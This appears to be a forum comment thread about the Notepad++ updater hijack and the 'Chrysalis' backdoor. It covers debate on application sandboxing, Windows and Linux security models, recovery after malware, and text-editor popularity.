> In the same way someone working on software shouldn't be required to use an end-user consumption system when they are at work.
I'm worried that many software developers (including me, a lot of the time) will only enable security after exhausting all other options. So long as there's a big button labeled "Developer Mode" or "Run as Admin" which turns off all the best security features, I bet lots of software will require that to be enabled in order to work.
Apple has quite impressive frameworks for application sandboxing. Do any apps use them? Do those DAWs that sound engineers use run VST plugins in a sandbox? Or do they just dyld + call? I bet most of the time its the latter. And look at this Notepad++ attack. The attack would have been stopped dead if the update process validated digital signatures. But no, it was too hard so instead they got their users' computers hacked.
I'm a pragmatist. I want a useful, secure computing environment. Show me how to do that without annoying developers and I'm all in. But I worry that the only way a proper capability model would be used would be by going all in.
In such a scenario, you can launch your IDE from your application manager and then only give write access to specific folders for a project. The IDE's configuration files can also be stored in isolated directories. You can still access them with your file manager software or your terminal app which are "special" and need to be approved by you once (or for each update) as special. You may think "How do I even share my secrets like Git SSH keys?". Well that's why we need services like the SSH Agent or Freedesktop secret-storage-spec. Windows already has this btw as the secret vaults. They are there since at least Windows 7 maybe even Vista.
naturally even flatpak on Linux suffers from this as legacy software simply doesn’t have a concept of permission models and this cannot be bolted on after the fact
try to run gimp inside a container for example, you’ll have to give access to your ~/Pictures or whatever for it to be useful
Compared to some photo editing applications on android/iOS which can work without having filesystem access by getting the file through the OS file picker
Damn file protection not even enough…
Or the easier way with an external tool is using Sandboxie: https://sandboxie-plus.com/
There are so many nooks and crannies where malware can hide, and Windows doesn't enforce any boundaries that can't be crossed with a trivial UAC dialog.
Windows enforces driver signing and has a deeper access control system that means a root account doesn't even truly exist. The SYSTEM pseudo-account looks like it should be that, but you can actually set up ACLs that make files untouchable by it. In fact if you check the files in System32, they are only writable by TrustedInstaller. A user's administrative token and SYSTEM have no access those files.
But when it comes down to it, I wouldn't trust any system that has had malware on it. At the very least I'd do a complete reinstall. It might even be worth re-flashing the firmware of all components of the system too, but the chances of those also being infected are lower as long as signed firmware is required.
In Linux, one could write a script that reinstalls all packages, cleans up anything that doesn't belong to an installed package, and asks you about files it's not sure about. It's easy to modify a Linux system, but just as easy to restore it to a known state.
Malware and supply chain attack landscape is totally different now. Linux has many more viruses than in the past . People don’t actively scan because they are operating on a 1990s mindset
I'm surprised this wasn't linked from the original notepad++ disclosure
Sadly, it feels like Microsoft updates lately have trended back towards being unreliable and even user hostile. It's messed up if you update and can't boot your machine afterwards, but here we are. People are going to turn off automatic updates again.
https://docs.github.com/en/code-security/reference/supply-ch...
Using notepad++ (or whatever other program) in a manner that deals with internet content a lot - then updating is the thing.
Using these tools in a trusted space (local files/network only) : then don't update unless it needs to be different to do what you want.
For many people, something in between because new files/network-tech comes and goes from the internet. So, update occasionally...
Disagree. It's hard to screw up a text editor so much that you have buffer overflows 10 years after it's released, so it's probably safe. It's not impossible, but based on a quick search (though incomplete because google is filled with articles describing this incident) it doesn't look like there were any vulnerabilities that could be exploited by arbitrary input files. The most was some dubious vulnerability around being able to plant plugins.
Do you mean I should worry about the fixed CVEs that are announced and fixed for every other distribution at the same time? Is that the supply-chain attack you're referring to?
Naive question, but isn't this relatively safe information to expose for this level of attack? I guess the idea is to find systems vulnerable to 0-day exploits and similar based on this info? Still, that seems like a lot of effort just to get this data.
You don't need 0days when you already have RCE on an unsandboxed system.
Could this be the attacker? The scan happened before the hack was first exposed on the forum.
Notepad++ hijacked by state-sponsored actors
https://news.ycombinator.com/item?id=46851548
https://arstechnica.com/security/2026/02/notepad-updater-was...
I recommend removing notepad++ and installing via winget which installs the EXE directly without the winGUP updater service.
Here's an AI summary explaining who is affected.
Affected Versions: All versions of Notepad++ released prior to version 8.8.9 are considered potentially affected if an update was initiated during the compromise window.
Compromise Window: Between June 2025 and December 2, 2025.
Specific Risk: Users running older versions that utilized the WinGUp update tool were vulnerable to being redirected to malicious servers. These servers delivered trojanized installers containing a custom backdoor dubbed Chrysalis.
https://community.notepad-plus-plus.org/topic/27212/autoupda...
Thankfully the responses weren’t outright dismissive, which is usually the case in these situations.
It was thought to be a local compromise and nothing to do Notepad++.
Good lessons to be learned here. Don’t be quick to dismiss things simply because it doesn’t fit what you think should be happening. That’s the whole point. It doesn’t fit, so investigate why.
Most tech support aims to prove the person wrong right out the gate.
It's listed as the third most popular IDE after Visual Studio Code and Visual Studio by respondents to Stack Overflow's annual survey. Interestingly, it's higher among professionals than learners. Maybe that's because learners are going to be using some of those newer AI-adjacent editors, or because learners are less likely to be using Windows at all.
I'm sure people will leap to the defense of their chosen text editor, like they always do. "Oh, they separated vim and Neovim! Those are basically the same! I can combine those, really, to get a better score!" But I think a better takeaway is that it's incredible that Notepad++, an open source application exclusive to Windows that has had, basically, a single developer over the course of 22 years, has managed to reach such a widespread audience. Especially when Scintilla's other related editors (SciTE, EditPlus) essentially don't rate.
If vim were good enough, neovim wouldn't exist. If neovim were that much better, vim wouldn't still be as popular as it is. And if neither of them did anything worth picking up, then vi would still outrank them.
The conclusion is that they don't do the same things. They just both have the vi interface. But having a vi interface isn't particularly weird anymore. SublimeText and vscode have vi bindings. So does PyCharm/IntelliJ. So does Notepad++! Heck, so does nano! So who gets to claim those editors? Vscode is the most popular editor that supports a vi-like interface. Shouldn't that mean that vscode is the best of the "vi descendants"? Or does it mean that all these people were okay with the vi interface, but had a good reason not to make the choice they did for another editor?
Fundamentally, the issue is: Either choice matters, or popularity doesn't matter. You can't have it both ways.
You can use the 2022 (ie. pre-chatgpt) results for control for that. The results are basically the same.
https://survey.stackoverflow.co/2022/#most-popular-technolog...
This train of thought made me go find https://www.oldversion.com/. For a while, that was invaluable.
And of course “Ed is the standard text editor.”
> https://www.gnu.org/fun/jokes/ed-msg.en.html
For something functionality close I would look at Kate.
https://sessionbuddy.com/